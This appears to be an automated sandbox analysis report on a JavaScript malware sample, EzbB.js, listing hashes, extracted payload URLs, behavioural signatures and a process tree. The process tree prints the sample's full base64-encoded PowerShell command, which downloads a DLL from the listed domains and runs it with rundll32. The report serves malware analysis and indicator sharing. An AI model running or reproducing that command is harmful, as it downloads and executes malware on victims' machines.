Analysis
-
max time kernel
82s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
16/03/2023, 12:58
Static task
static1
Behavioral task
behavioral1
Sample
EzbB.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
EzbB.js
Resource
win10v2004-20230220-en
General
-
Target
EzbB.js
-
Size
70KB
-
MD5
73d754b590ed9cd852abbc498226fe32
-
SHA1
110176efe121008f276dde05f221ed73667bfbbe
-
SHA256
5225bae347aa4e997bcbee30cbb9d6d65ec9741daa2a0358590dc7e79b26147d
-
SHA512
0e0a797f1adff252d27e7bd64c59faf20512a3673fe8888baf0227de72f50e0cba58ffff23ad54d9e2939d661a39e65fff389c82b896d02fd1c1fd4bdd4ff430
-
SSDEEP
768:6vgJpI88PYShd0C8P7dvtT5rFQdkSmGyC9zkxSqLHGxAbjrC84T9B7uvbBrao164:6WpIP50Bd1dFzxxYWdTZtYSdEJ8StyP
Malware Config
Extracted
https://londonairportstransfer.co.uk/0OK/uo
https://hergelekitap.com.tr/YZmYWp/uo
https://sugerandflour-eg.com/MRdabu5/uo
https://birdsofnepal.org/Tu8T/uo
https://batbricks7.com/JcJp/uo
https://dimopark.com/O9O/uo
https://faplanning.co.uk/yQ4bTb7/uo
https://hanika-inc.com/mjnPR9/uo
https://solusiruang.com/fkSNnmZ/uo
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 33 1920 powershell.exe 35 1920 powershell.exe 39 1920 powershell.exe 45 1920 powershell.exe 51 1920 powershell.exe 53 1920 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 1 IoCs
pid Process 4792 rundll32.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4792 set thread context of 4480 4792 rundll32.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1920 powershell.exe 1920 powershell.exe 4792 rundll32.exe 4792 rundll32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
pid Process 4792 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1920 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1772 wrote to memory of 1920 1772 wscript.exe 86 PID 1772 wrote to memory of 1920 1772 wscript.exe 86 PID 1920 wrote to memory of 1020 1920 powershell.exe 94 PID 1920 wrote to memory of 1020 1920 powershell.exe 94 PID 1020 wrote to memory of 4792 1020 rundll32.exe 95 PID 1020 wrote to memory of 4792 1020 rundll32.exe 95 PID 1020 wrote to memory of 4792 1020 rundll32.exe 95 PID 4792 wrote to memory of 4480 4792 rundll32.exe 98 PID 4792 wrote to memory of 4480 4792 rundll32.exe 98 PID 4792 wrote to memory of 4480 4792 rundll32.exe 98 PID 4792 wrote to memory of 4480 4792 rundll32.exe 98 PID 4792 wrote to memory of 4480 4792 rundll32.exe 98 PID 4792 wrote to memory of 4480 4792 rundll32.exe 98 PID 4792 wrote to memory of 4480 4792 rundll32.exe 98 PID 4792 wrote to memory of 4480 4792 rundll32.exe 98 PID 4792 wrote to memory of 4480 4792 rundll32.exe 98
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\EzbB.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAYgBlAHcAcgBlAGEAawAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGwAbwBuAGQAbwBuAGEAaQByAHAAbwByAHQAcwB0AHIAYQBuAHMAZgBlAHIALgBjAG8ALgB1AGsALwAwAE8ASwAvAHUAbwAsAGgAdAB0AHAAcwA6AC8ALwBoAGUAcgBnAGUAbABlAGsAaQB0AGEAcAAuAGMAbwBtAC4AdAByAC8AWQBaAG0AWQBXAHAALwB1AG8ALABoAHQAdABwAHMAOgAvAC8AcwB1AGcAZQByAGEAbgBkAGYAbABvAHUAcgAtAGUAZwAuAGMAbwBtAC8ATQBSAGQAYQBiAHUANQAvAHUAbwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAcgBkAHMAbwBmAG4AZQBwAGEAbAAuAG8AcgBnAC8AVAB1ADgAVAAvAHUAbwAsAGgAdAB0AHAAcwA6AC8ALwBiAGEAdABiAHIAaQBjAGsAcwA3AC4AYwBvAG0ALwBKAGMASgBwAC8AdQBvACwAaAB0AHQAcABzADoALwAvAGQAaQBtAG8AcABhAHIAawAuAGMAbwBtAC8ATwA5AE8ALwB1AG8ALABoAHQAdABwAHMAOgAvAC8AZgBhAHAAbABhAG4AbgBpAG4AZwAuAGMAbwAuAHUAawAvAHkAUQA0AGIAVABiADcALwB1AG8ALABoAHQAdABwAHMAOgAvAC8AaABhAG4AaQBrAGEALQBpAG4AYwAuAGMAbwBtAC8AbQBqAG4AUABSADkALwB1AG8ALABoAHQAdABwAHMAOgAvAC8AcwBvAGwAdQBzAGkAcgB1AGEAbgBnAC4AYwBvAG0ALwBmAGsAUwBOAG4AbQBaAC8AdQBvACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFMAcABlAGUAZAB1AHAAIABpAG4AIAAkAGIAZQB3AHIAZQBhAGsAKQAgAHsAdAByAHkAIAB7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAUwBwAGUAZQBkAHUAcAAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADIAMAAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAZQB4AG8AdABlAHIAaQBjAGEAbABsAHkAUABhAGwAZgBnAGUAeQBzAC4AZABsAGwAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABlAHgAbwB0AGUAcgBpAGMAYQBsAGwAeQBQAGEAbABmAGcAZQB5AHMALgBkAGwAbAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABlAHgAbwB0AGUAcgBpAGMAYQBsAGwAeQBQAGEAbABmAGcAZQB5AHMALgBkAGwAbAAsAEwAUwA4ADgAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\exotericallyPalfgeys.dll LS883⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\exotericallyPalfgeys.dll LS884⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\SysWOW64\WWAHost.exe"C:\Windows\SysWOW64\WWAHost.exe"5⤵PID:4480
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.3MB
MD5714587c61da3cd93994bbb46793f02b9
SHA1ff521f0bd0193e705b6fde889392af23005e519b
SHA25681ecfa3eb5f1e6e1711d08ee7465e8f371eafb75dee2332684099ae434dedd84
SHA512abd123876f1998c9139840454ec66ab652150d3a13f25bacb257b4401c0ea9de23ecb1c1aa37fba9e9ed460c81ba94216859ae7931b46092d65104f3ad742502
-
Filesize
1.3MB
MD5714587c61da3cd93994bbb46793f02b9
SHA1ff521f0bd0193e705b6fde889392af23005e519b
SHA25681ecfa3eb5f1e6e1711d08ee7465e8f371eafb75dee2332684099ae434dedd84
SHA512abd123876f1998c9139840454ec66ab652150d3a13f25bacb257b4401c0ea9de23ecb1c1aa37fba9e9ed460c81ba94216859ae7931b46092d65104f3ad742502